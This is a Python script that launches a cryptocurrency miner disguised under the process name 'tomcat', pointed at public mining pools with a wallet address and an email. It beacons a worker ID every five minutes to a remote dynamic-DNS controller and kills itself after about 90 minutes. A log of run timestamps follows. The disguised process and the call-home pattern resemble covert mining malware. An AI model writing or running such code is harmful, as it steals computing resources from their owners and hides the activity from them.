import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:17:05.234630
#2018-02-17 16:04:06.822424
#2018-02-17 17:52:02.214305
#2018-02-17 19:38:06.620608
#2018-02-17 21:26:06.561331
#2018-02-17 23:10:08.237844
#2018-02-18 00:57:05.120140
#2018-02-18 02:45:04.263840
#2018-02-18 04:34:06.442535
#2018-02-18 06:25:05.838812
#2018-02-18 08:14:04.368638
#2018-02-18 10:01:06.889154
#2018-02-18 11:47:05.626011
#2018-02-18 13:32:01.900476
#2018-02-18 15:22:03.109487
#2018-02-18 17:11:01.499240
#2018-02-18 18:58:07.289215
#2018-02-18 20:45:06.088946
#2018-02-18 22:31:06.451456
#2018-02-19 00:19:01.552171
#2018-02-19 02:05:08.508773
#2018-02-19 03:53:07.168124
#2018-02-19 05:39:06.100595
#2018-02-19 07:26:07.793918
#2018-02-19 09:16:01.878548
#2018-02-19 11:05:07.308684
#2018-02-19 12:53:07.982890
#2018-02-19 14:40:10.100160
#2018-02-19 16:28:04.735772
#2018-02-19 18:16:06.934614
#2018-02-19 20:04:05.710354
#2018-02-19 21:54:06.335391
#2018-02-19 23:41:01.722400
#2018-02-20 01:28:04.490279
#2018-02-20 03:16:06.080245
#2018-02-20 05:02:07.600289
#2018-02-20 06:46:06.754815
#2018-02-20 08:32:01.738575
#2018-02-20 10:16:01.455199
#2018-02-20 12:01:05.699145
#2018-02-20 13:48:11.341941
#2018-02-20 15:34:04.890417
#2018-02-20 17:20:01.407466
#2018-02-20 19:09:09.505277
#2018-02-20 20:59:01.676717
#2018-02-20 22:45:06.807539
#2018-02-21 00:29:01.332313
#2018-02-21 02:15:07.989251
#2018-02-21 04:02:04.593514
#2018-02-21 05:49:06.878546
#2018-02-21 07:39:01.575069
#2018-02-21 09:24:07.569483
#2018-02-21 11:13:05.373559
#2018-02-21 13:02:06.296270
#2018-02-21 14:51:06.002785
#2018-02-21 16:38:09.121074
#2018-02-21 18:29:01.976438
#2018-02-21 20:14:01.436691
#2018-02-21 22:02:02.152357
#2018-02-21 23:49:05.372530
#2018-02-22 01:38:04.681013
#2018-02-22 03:25:03.834523
#2018-02-22 05:11:07.494188
#2018-02-22 06:55:06.574656
#2018-02-22 08:42:04.799739
#2018-02-22 10:29:01.606786
#2018-02-22 12:14:08.553663
#2018-02-22 14:00:10.729757
#2018-02-22 15:48:09.115030
#2018-02-22 17:37:04.594974
#2018-02-22 19:24:07.889609
#2018-02-22 21:15:07.576571
#2018-02-22 23:01:01.578059
#2018-02-23 00:47:06.823328
#2018-02-23 02:36:04.587982
#2018-02-23 04:23:06.907165
#2018-02-23 06:10:04.168098
#2018-02-23 07:57:04.304086
#2018-02-23 10:14:02.027421
#2018-02-23 12:06:01.747274
#2018-02-23 13:54:05.932045
#2018-02-23 15:47:10.425138
#2018-02-23 17:33:01.816752
#2018-02-23 19:22:01.243173
#2018-02-23 21:06:08.313812
#2018-02-23 22:52:06.550911
#2018-02-24 00:40:10.816698
#2018-02-24 02:32:03.831223
#2018-02-24 05:13:01.242411
#2018-02-24 07:01:05.247266
#2018-02-24 08:36:03.967959
#2018-02-24 10:09:01.287051
#2018-02-24 11:57:07.148679
#2018-02-24 13:24:04.736278
#2018-02-24 14:55:05.706125
#2018-02-24 16:29:04.252514
#2018-02-24 18:05:06.536358
#2018-02-24 19:33:07.642568
#2018-02-24 21:09:07.538592
#2018-02-24 23:16:03.252234
#2018-02-25 01:36:03.899426
#2018-02-25 05:10:07.802658
#2018-02-25 10:45:01.778645